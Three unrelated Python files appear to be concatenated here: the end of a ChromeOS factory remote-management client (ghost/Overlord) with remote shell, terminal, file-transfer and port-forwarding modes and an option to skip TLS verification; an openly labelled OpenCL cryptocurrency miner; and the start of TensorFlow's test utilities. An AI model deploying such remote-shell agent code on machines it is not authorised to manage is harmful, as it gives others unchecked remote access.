except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('%s: %s', e.__class__.__name__, e)
continue
except IOError as e:
if e.errno == 2: # No such file or directory
logging.error('%s: %s', e.__class__.__name__, e)
continue
raise
self._sock = BufferedSocket(sock)
logging.info('Connection established, registering...')
handler = {
Ghost.AGENT: registered,
Ghost.TERMINAL: self.SpawnTTYServer,
Ghost.SHELL: self.SpawnShellServer,
Ghost.FILE: self.InitiateFileOperation,
Ghost.FORWARD: self.SpawnPortForwardServer,
}[self._mode]
# Machine ID may change if MAC address is used (USB-ethernet dongle
# plugged/unplugged)
self._machine_id = self.GetMachineID()
self.SendRequest('register',
{'mode': self._mode, 'mid': self._machine_id,
'sid': self._session_id,
'properties': self._properties}, handler)
except socket.error:
pass
else:
# We only send DUT data when in agent mode.
if self._mode == Ghost.AGENT:
self.SendData()
if self._track_connection is not None:
self.TrackConnection(self._track_connection,
self._track_connection_timeout_secs)
sock.settimeout(None)
self.Listen()
raise RuntimeError('Cannot connect to any server')
def Reconnect(self):
logging.info('Received reconnect request from RPC server, reconnecting...')
self._reset.set()
def CollectPytestAndStatus(self):
STATUS = Enum(['failed', 'running', 'idle'])
goofy = state.GetInstance()
tests = goofy.GetTests()
# Ignore parents
tests = [x for x in tests if not x.get('parent')]
scheduled_tests = (
goofy.GetTestRunStatus(None).get('scheduled_tests') or [])
scheduled_tests = {t['path']
for t in scheduled_tests}
tests = [x for x in tests if x['path'] in scheduled_tests]
data = {
'pytest': '',
'status': STATUS.idle
}
def parse_pytest_name(test):
# test['path'] format: 'test_list_name:pytest_name'
return test['path'][test['path'].index(':') + 1:]
for test in filter(lambda t: t['status'] == TestState.ACTIVE, tests):
data['pytest'] = parse_pytest_name(test)
data['status'] = STATUS.running
return data
for test in filter(lambda t: t['status'] == TestState.FAILED, tests):
data['pytest'] = parse_pytest_name(test)
data['status'] = STATUS.failed
return data
if tests:
data['pytest'] = parse_pytest_name(tests[0])
return data
def CollectModelName(self):
return {
'model': cros_config_module.CrosConfig().GetModelName()
}
def CollectIP(self):
ip_addrs = []
for interface in net_utils.GetNetworkInterfaces():
ip = net_utils.GetEthernetIp(interface)[0]
if ip:
ip_addrs.append(ip)
return {
'ip': ip_addrs
}
def CollectSerial(self):
return {
'serial': device_data.GetSerialNumber()
}
def CollectData(self):
"""Collect dut data.
Data includes:
1. status: Current test status
2. pytest: Current pytest
3. model: Model name
4. ip: IP
5. serial: Serial number
"""
data = {}
data.update(self.CollectPytestAndStatus())
data.update(self.CollectModelName())
data.update(self.CollectIP())
data.update(self.CollectSerial())
return data
def SendData(self):
if not sys_utils.InCrOSDevice():
return
data = self.CollectData()
logging.info('data = %s', data)
self.SendRequest('update_dut_data', data)
def TrackConnection(self, enabled, timeout_secs):
logging.info('TrackConnection, enabled = %s, timeout_secs = %d', enabled,
timeout_secs)
self._track_connection = enabled
self._track_connection_timeout_secs = timeout_secs
self.SendRequest('track_connection', {
'enabled': enabled,
'timeout_secs': timeout_secs
})
def GetStatus(self):
status = self._register_status
if self._register_status == SUCCESS:
ip, port = self._sock.sock.getpeername()
status += ' %s:%d' % (ip, port)
return status
def AddToDownloadQueue(self, ttyname, filename):
self._download_queue.put((ttyname, filename))
def RegisterTTY(self, session_id, ttyname):
self._ttyname_to_sid[ttyname] = session_id
def RegisterSession(self, session_id, process_id):
self._terminal_sid_to_pid[session_id] = process_id
def StartLanDiscovery(self):
"""Start to listen to LAN discovery packet at
_OVERLORD_LAN_DISCOVERY_PORT."""
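# Discovery datagrams look like 'OVERLORD <ip>:<port>'; an empty <ip> means
# the packet's source address should be used.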
def thread_func():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
try:
s.bind(('0.0.0.0', _OVERLORD_LAN_DISCOVERY_PORT))
except socket.error as e:
logging.error('LAN discovery: %s, abort', e)
return
logging.info('LAN Discovery: started')
while True:
rd, unused_wd, unused_xd = select.select([s], [], [], 1)
if s in rd:
data, source_addr = s.recvfrom(_BUFSIZE)
parts = data.decode('utf-8', errors='ignore').split()
if parts and parts[0] == 'OVERLORD':
ip, port = parts[1].split(':')
if not ip:
ip = source_addr[0]
self._queue.put((ip, int(port)), True)
try:
obj = self._queue.get(False)
except queue.Empty:
pass
else:
if not isinstance(obj, str):
self._queue.put(obj)
elif obj == 'pause':
logging.info('LAN Discovery: paused')
while obj != 'resume':
obj = self._queue.get(True)
logging.info('LAN Discovery: resumed')
t = threading.Thread(target=thread_func)
t.daemon = True
t.start()
def StartRPCServer(self):
logging.info('RPC Server: started')
rpc_server = SimpleJSONRPCServer((_DEFAULT_BIND_ADDRESS, _GHOST_RPC_PORT),
logRequests=False)
rpc_server.register_function(self.SendData, 'SendData')
rpc_server.register_function(self.Reconnect, 'Reconnect')
rpc_server.register_function(self.GetStatus, 'GetStatus')
rpc_server.register_function(self.RegisterTTY, 'RegisterTTY')
rpc_server.register_function(self.RegisterSession, 'RegisterSession')
rpc_server.register_function(self.TrackConnection, 'TrackConnection')
rpc_server.register_function(self.AddToDownloadQueue, 'AddToDownloadQueue')
t = threading.Thread(target=rpc_server.serve_forever)
t.daemon = True
t.start()
def ApplyTestListParams(self):
mgr = manager.Manager()
device = sys_interface.SystemInterface()
constants = mgr.GetTestListByID(mgr.GetActiveTestListId(device)).constants
if 'overlord' not in constants:
return
if 'overlord_urls' in constants['overlord']:
for addr in [(x, _OVERLORD_PORT) for x in
constants['overlord']['overlord_urls']]:
if addr not in self._overlord_addrs:
self._overlord_addrs.append(addr)
# This is sugar for the ODM to quickly turn off verification if they forgot.
# Turning it back on again is not supported; to re-enable verification, the
# ghost daemon has to be restarted.
if 'tls_no_verify' in constants['overlord']:
if constants['overlord']['tls_no_verify']:
self._tls_settings = TLSSettings(None, False)
def ScanServer(self):
for meth in [self.GetGateWayIP, self.GetFactoryServerIP]:
for addr in [(x, _OVERLORD_PORT) for x in meth()]:
if addr not in self._overlord_addrs:
self._overlord_addrs.append(addr)
def Start(self, lan_disc=False, rpc_server=False):
logging.info('%s started', self.MODE_NAME[self._mode])
logging.info('MID: %s', self._machine_id)
logging.info('SID: %s', self._session_id)
# We don't care about the child process's return code, so no wait is needed.
# This is used to prevent zombie processes from lingering in the system.
self.SetIgnoreChild(True)
if lan_disc:
self.StartLanDiscovery()
if rpc_server:
self.StartRPCServer()
try:
while True:
try:
addr = self._queue.get(False)
except queue.Empty:
pass
else:
if isinstance(addr, tuple) and addr not in self._overlord_addrs:
logging.info('LAN Discovery: got overlord address %s:%d', *addr)
self._overlord_addrs.append(addr)
if self._mode == Ghost.AGENT:
self.ApplyTestListParams()
try:
self.ScanServer()
self.Register()
# Don't show stack trace for RuntimeError, which we use in this file for
# plausible and expected errors (such as can't connect to server).
except RuntimeError as e:
logging.info('%s, retrying in %ds', str(e), _RETRY_INTERVAL)
time.sleep(_RETRY_INTERVAL)
except Exception as e:
unused_x, unused_y, exc_traceback = sys.exc_info()
traceback.print_tb(exc_traceback)
logging.info('%s: %s, retrying in %ds',
e.__class__.__name__, str(e), _RETRY_INTERVAL)
time.sleep(_RETRY_INTERVAL)
self.Reset()
except KeyboardInterrupt:
logging.error('Received keyboard interrupt, quit')
sys.exit(0)
def GhostRPCServer():
"""Returns handler to Ghost's JSON RPC server."""
return jsonrpclib.Server('http://localhost:%d' % _GHOST_RPC_PORT)
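# Illustrative use: GhostRPCServer().GetStatus() queries the local ghost
# daemon over JSON RPC, mirroring what `--status` does in main() below.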
def ForkToBackground():
"""Fork process to run in background."""
pid = os.fork()
if pid != 0:
logging.info('Ghost(%d) running in background.', pid)
sys.exit(0)
def DownloadFile(filename):
"""Initiate a client-initiated file download."""
filepath = os.path.abspath(filename)
if not os.path.exists(filepath):
logging.error('file `%s\' does not exist', filename)
sys.exit(1)
# Check if we actually have permission to read the file
if not os.access(filepath, os.R_OK):
logging.error('can not open %s for reading', filepath)
sys.exit(1)
server = GhostRPCServer()
server.AddToDownloadQueue(os.ttyname(0), filepath)
sys.exit(0)
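# Note: AddToDownloadQueue is keyed by the calling terminal (os.ttyname(0)),
# presumably so the Overlord server can associate the download with the
# remote terminal session that initiated it.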
def main():
# Setup logging format
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(message)s', '%Y/%m/%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
parser = argparse.ArgumentParser()
parser.add_argument('--fork', dest='fork', action='store_true', default=False,
help='fork process to run in background')
parser.add_argument('--mid', metavar='MID', dest='mid', action='store',
default=None, help='use MID as machine ID')
parser.add_argument('--rand-mid', dest='mid', action='store_const',
const=Ghost.RANDOM_MID, help='use random machine ID')
parser.add_argument('--no-lan-disc', dest='lan_disc', action='store_false',
default=True, help='disable LAN discovery')
parser.add_argument('--no-rpc-server', dest='rpc_server',
action='store_false', default=True,
help='disable RPC server')
parser.add_argument('--tls', dest='tls_mode', default='detect',
choices=('y', 'n', 'detect'),
help="specify 'y' or 'n' to force enable/disable TLS")
parser.add_argument(
'--tls-cert-file', metavar='TLS_CERT_FILE', dest='tls_cert_file',
type=str, default=None,
help='file containing the server TLS certificate in PEM '
'format')
parser.add_argument('--tls-no-verify', dest='tls_no_verify',
action='store_true', default=False,
help='do not verify certificate if TLS is enabled')
parser.add_argument(
'--prop-file', metavar='PROP_FILE', dest='prop_file', type=str,
default=None, help='file containing the JSON representation of client '
'properties')
parser.add_argument('--ovl-path', metavar='OVL_PATH', dest='ovl_path',
type=str, default=None, help='path to ovl tool')
parser.add_argument('--certificate-dir', metavar='CERTIFICATE_DIR',
dest='certificate_dir', type=str, default=None,
help='path to overlord certificate directory')
parser.add_argument('--download', metavar='FILE', dest='download', type=str,
default=None, help='file to download')
parser.add_argument('--reset', dest='reset', default=False,
action='store_true',
help='reset ghost and reload all configs')
parser.add_argument('--send-data', dest='send_data', default=False,
action='store_true',
help='send client data to overlord server')
parser.add_argument('--status', dest='status', default=False,
action='store_true',
help='show status of the client')
parser.add_argument('--track-connection', dest='track_connection',
default=None, choices=('y', 'n'),
help="specify 'y' or 'n' to track connection or not")
parser.add_argument('--timeout-seconds', dest='timeout_secs', type=int,
default=900,
help='timeout in seconds when tracking the connection')
parser.add_argument('overlord_ip', metavar='OVERLORD_IP', type=str, nargs='*',
help='overlord server address')
args = parser.parse_args()
if args.status:
print(GhostRPCServer().GetStatus())
sys.exit()
if args.fork:
ForkToBackground()
if args.reset:
GhostRPCServer().Reconnect()
sys.exit()
if args.send_data:
GhostRPCServer().SendData()
sys.exit()
if args.track_connection:
GhostRPCServer().TrackConnection(args.track_connection == 'y',
args.timeout_secs)
sys.exit()
if args.download:
DownloadFile(args.download)
addrs = [('localhost', _OVERLORD_PORT)]
addrs = [(x, _OVERLORD_PORT) for x in args.overlord_ip] + addrs
prop_file = os.path.abspath(args.prop_file) if args.prop_file else None
tls_settings = TLSSettings(args.tls_cert_file, not args.tls_no_verify)
tls_mode = args.tls_mode
tls_mode = {'y': True, 'n': False, 'detect': None}[tls_mode]
g = Ghost(addrs, tls_settings, Ghost.AGENT, args.mid, prop_file=prop_file,
tls_mode=tls_mode, ovl_path=args.ovl_path,
certificate_dir=args.certificate_dir)
g.Start(args.lan_disc, args.rpc_server)
if __name__ == '__main__':
try:
main()
except Exception as e:
logging.error(e)
|
clminer.py
|
import options, time
import pyopencl as cl
import numpy as np
import threading, queue
# load config
config = options.Get()
config.read()
opencl_hash_count = config.opencl_hash_count_conf
opencl_timeout = config.opencl_timeout_conf
opencl_thread_multiplier = config.opencl_thread_multiplier_conf
opencl_disable_device = config.opencl_disable_device_conf
opencl_full_check = config.opencl_full_check_conf
# OpenCL classes
class oclResultQueue:
def __init__(self):
self.resultQueue_ = queue.Queue()
def getNextCandidate(self, timeout):
if timeout is not None and timeout <= 0:
return None, 0
try:
candidate = self.resultQueue_.get( timeout=timeout )
self.resultQueue_.task_done()
return candidate, self.resultQueue_.qsize()
except queue.Empty:
return None, 0
def pushCandidate(self, candidate):
self.resultQueue_.put( candidate )
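# oclResultQueue is the hand-off point between GPU worker threads and the
# caller: each oclDevice thread pushes candidate nonces via pushCandidate(),
# while the consumer polls getNextCandidate() with a timeout.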
class oclDevice:
def __init__(self, threadId, platId, devId, resultQueue):
self.devId_ = devId
self.platId_ = platId
self.thread_ = None
self.threadId_ = threadId
self.threadCount_ = 0
self.resultQueue_ = resultQueue
def getName( self ):
return self.device_.name
def getThreadCount( self ):
return self.threadCount_
def setupCL( self, hash_count ):
try:
self.platform_ = cl.get_platforms()[ self.platId_ ]
self.device_ = self.platform_.get_devices( device_type=cl.device_type.GPU )[ self.devId_ ]
self.threadCount_ = opencl_thread_multiplier * self.device_.max_work_group_size
self.hashCount_ = np.uint32( hash_count )
print( "Setuping OpenCL miner for {}...".format( self.getName() ) )
self.ctx_ = cl.Context( devices=[self.device_],
properties=[(cl.context_properties.PLATFORM, self.platform_)] )
assert self.ctx_ is not None
self.queue_ = cl.CommandQueue( context=self.ctx_, device=self.device_ )
assert self.queue_ is not None
self.header_ = cl.Buffer( self.ctx_, size=56, flags=cl.mem_flags.READ_ONLY )
assert self.header_ is not None
self.tail_ = cl.Buffer( self.ctx_, size=56, flags=cl.mem_flags.READ_ONLY )
assert self.tail_ is not None
threadCount = self.threadCount_
self.seed_ = cl.Buffer( self.ctx_, size=threadCount*8, flags=cl.mem_flags.READ_WRITE )
assert self.seed_ is not None
seed = np.random.bytes(threadCount*8)
cl.enqueue_copy( self.queue_, src=seed, dest=self.seed_ )
nonce0 = cl.Buffer( self.ctx_, size=self.retSize(), flags=cl.mem_flags.WRITE_ONLY )
assert nonce0 is not None
nonce1 = cl.Buffer( self.ctx_, size=self.retSize(), flags=cl.mem_flags.WRITE_ONLY )
assert nonce1 is not None
map0 = cl.Buffer( self.ctx_, size=self.retCount(), flags=cl.mem_flags.WRITE_ONLY )
assert map0 is not None
map1 = cl.Buffer( self.ctx_, size=self.retCount(), flags=cl.mem_flags.WRITE_ONLY )
assert map1 is not None
cnt0 = cl.Buffer( self.ctx_, size=4, flags=cl.mem_flags.READ_WRITE)
assert cnt0 is not None
cnt1 = cl.Buffer( self.ctx_, size=4, flags=cl.mem_flags.READ_WRITE)
assert cnt1 is not None
self.ret_ = [ nonce0, nonce1 ]
self.retMap_ = [ map0, map1 ]
self.retCnt_ = [ cnt0, cnt1 ]
with open("opencl/bismuth.cl", "r") as clfile:
source = clfile.read()
self.program_ = cl.Program( self.ctx_, source )
assert self.program_ is not None
print( "Compiling OpenCL low diffculty miner for {}...".format( self.getName() ) )
compileOp=[ "-cl-mad-enable", "-DHASH_COUNT={}".format(hash_count) ]
if opencl_full_check != 0:
compileOp.append( "-DBISMUTH_FULL_GPU_CHECK=1" )
self.program_.build( options=compileOp, devices=[ self.device_ ] )
#with open("bismuth.bin", "bw") as binfile:
# binfile.write( self.program_.binaries[0] )
kernel0 = self.program_.bismuth
assert kernel0 is not None
kernel1 = self.program_.bismuth
assert kernel1 is not None
self.kernelLow_ = [ kernel0, kernel1 ]
self.programHigh_ = cl.Program( self.ctx_, source )
print( "Compiling OpenCL high diffculty miner for {}...".format( self.getName() ) )
compileOp.append( "-DSEARCH_KEY_OVER_5=1" )
self.programHigh_.build( options=compileOp, devices=[ self.device_ ] )
kernelHi0 = self.programHigh_.bismuth
assert kernelHi0 is not None
kernelHi1 = self.programHigh_.bismuth
assert kernelHi1 is not None
self.kernelHigh_ = [ kernelHi0, kernelHi1 ]
self.retNonces_ = np.zeros( 4*self.retCount(), dtype='u4' )
self.retMaps_ = np.zeros( self.retCount(), dtype='B' )
except Exception as e:
print(e)
raise
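# setupCL allocates two complete sets of output buffers (ret_, retMap_,
# retCnt_) and two kernel instances so that processLoop() can ping-pong
# between them: the CPU reads back one batch of results while the GPU is
# already computing the next.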
def setKernelParams( self, key ):
self.key_ = key
self.kernelHigh_[0].set_args( self.header_, self.tail_,
self.seed_, self.hashCount_, key,
self.retCnt_[0],
self.ret_[0], self.retMap_[0] )
self.kernelHigh_[1].set_args( self.header_, self.tail_,
self.seed_, self.hashCount_, key,
self.retCnt_[1],
self.ret_[1], self.retMap_[1] )
self.kernelLow_[0].set_args( self.header_, self.tail_,
self.seed_, self.hashCount_, key,
self.retCnt_[0],
self.ret_[0], self.retMap_[0] )
self.kernelLow_[1].set_args( self.header_, self.tail_,
self.seed_, self.hashCount_, key,
self.retCnt_[1],
self.ret_[1], self.retMap_[1] )
self.kernel_ = self.kernelLow_ if key < 80 else self.kernelHigh_
def setHeader(self, header):
cl.enqueue_copy( self.queue_, src=header, dest=self.header_ )
def setTail(self, tail):
cl.enqueue_copy( self.queue_, src=tail, dest=self.tail_ )
self.label_ = tail[:10].decode("utf-8")
def readReturn( self, idx ):
ev0 = cl.enqueue_copy( self.queue_, src=self.ret_[ idx ], dest=self.retNonces_, is_blocking=False )
ev1 = cl.enqueue_copy( self.queue_, src=self.retMap_[ idx ], dest=self.retMaps_, is_blocking=False )
cl.wait_for_events( [ ev0, ev1 ] )
return self.retMaps_, self.retNonces_
def readCount( self, idx, waitev ):
ret = np.zeros( 1, dtype='u4' )
readev = cl.enqueue_copy( self.queue_, src=self.retCnt_[ idx ], dest=ret, is_blocking=False, wait_for=[waitev])
return readev, ret
def runFirst( self, idx ):
fillev = cl.enqueue_fill_buffer( self.queue_, self.retCnt_[ idx ],
np.uint8(0), 0, 4 )
runev = cl.enqueue_nd_range_kernel( self.queue_, self.kernel_[ idx ],
(self.threadCount_,), None, wait_for=[fillev] )
self.queue_.flush()
return runev
def run( self, idx, runev ):
fillev = cl.enqueue_fill_buffer( self.queue_, self.retCnt_[ idx ],
np.uint8(0), 0, 4 )
runev = cl.enqueue_nd_range_kernel( self.queue_, self.kernel_[ idx ],
(self.threadCount_,), None, wait_for=[fillev, runev] )
self.queue_.flush()
return runev
def retCount(self):
return self.threadCount_
def hashCount(self):
return self.hashCount_ * self.retCount()
def retSize(self):
return self.retCount() * 16
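# Buffer-size bookkeeping: retCount() is one slot per GPU work item,
# retSize() is 16 bytes per slot (a 4 x uint32 nonce), and hashCount()
# is the number of hashes attempted per kernel launch
# (HASH_COUNT per work item times the number of work items).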
#@profile
def processLoop(self):
loop = 0
looptime = 0
runev0 = self.runFirst( 0 )
while self.running_:
start = time.time()
# While the CPU checks hashes, the GPU generates more
# Finished ID0, so start ID1
readev0, ret0 = self.readCount( 0, runev0 )
runev1 = self.run( 1, runev0 )
readev0.wait()
if not self.running_:
break
if ret0[0] > 0:
map, nonce = self.readReturn( 0 )
index = map.nonzero()[0]
for idx in index:
nidx = idx*4
#print( "(python) Found on index {}".format( nidx ) )
self.resultQueue_.pushCandidate( [nonce[ nidx: nidx+4 ].copy(),
self.threadId_] )
# Finished ID1, so start ID0
# Read the count for buffer 1 (the batch kernel 1 just produced).
readev1, ret1 = self.readCount( 1, runev1 )
runev0 = self.run( 0, runev1 )
readev1.wait()
if not self.running_:
break
if ret1[0] > 0:
map, nonce = self.readReturn( 1 )
index = map.nonzero()[0]
for idx in index:
nidx = idx*4
#print( "(python) Found on index {}".format( nidx ) )
self.resultQueue_.pushCandidate( [nonce[ nidx: nidx+4 ].copy(),
self.threadId_] )
end = time.time()
looptime += end - start
loop = loop + 1
if (loop & 1) == 0:
hashesCnt = loop * 2 * self.hashCount()
cycles_per_second = hashesCnt/looptime
print( "Thread{} {} @ {:,.4f} sec, {:,.2f} cycles/second, hashes: {:,}".format(
self.threadId_, self.label_, looptime, cycles_per_second, hashesCnt ) )
loop = 0
looptime = 0
def startMining(self):
if self.thread_ is None:
self.running_ = True
self.thread_ = threading.Thread( target=self.processLoop )
self.thread_.start()
def stopMining(self):
self.running_ = False
self.thread_.join()
class ocl:
def __init__(self):
self.devices_ = []
def setupCL(self, resultQueue):
platId = 0
i = 0
print( "Searching for OpenCL devices..." )
platforms = cl.get_platforms()
for plat in platforms:
devId = 0
devs = plat.get_devices( device_type=cl.device_type.GPU )
for dev in devs:
print( "Device {}: {} ({} threads)".format( i, dev.name, dev.max_work_group_size ) )
self.devices_.append( oclDevice( i+1, platId, devId, resultQueue ) )
i = i + 1
devId = devId + 1
platId = platId + 1
if len(self.devices_) == 0:
print( "No OpenCL devices found" )
return
print( "{} OpenCL devices found".format( len(self.devices_) ) )
def getDevices(self):
return [dev for dev in range(len(self.devices_)) if dev not in opencl_disable_device]
def getMiners(self):
instances = self.getDevices()
miners = []
for q in instances:
m = self.getDevice(q)
m.setupCL( opencl_hash_count )
miners.append( m )
print("thread " + str(q+1) + " started")
return miners
def getDevice(self, idx):
return self.devices_[ idx ]
def getTimeout(self):
return opencl_timeout
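# Illustrative wiring of the classes above (a sketch, not part of the module;
# the header/tail/key values would come from the pool/network code elsewhere):
#
#   result_queue = oclResultQueue()
#   gpus = ocl()
#   gpus.setupCL(result_queue)
#   miners = gpus.getMiners()
#   for m in miners:
#       m.setHeader(header_bytes)               # hypothetical 56-byte buffer
#       m.setTail(tail_bytes)                   # hypothetical 56-byte buffer
#       m.setKernelParams(np.uint32(diff_key))  # hypothetical difficulty key
#       m.startMining()
#   candidate, backlog = result_queue.getNextCandidate(gpus.getTimeout())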
# OpenCL classes
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except ImportError:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
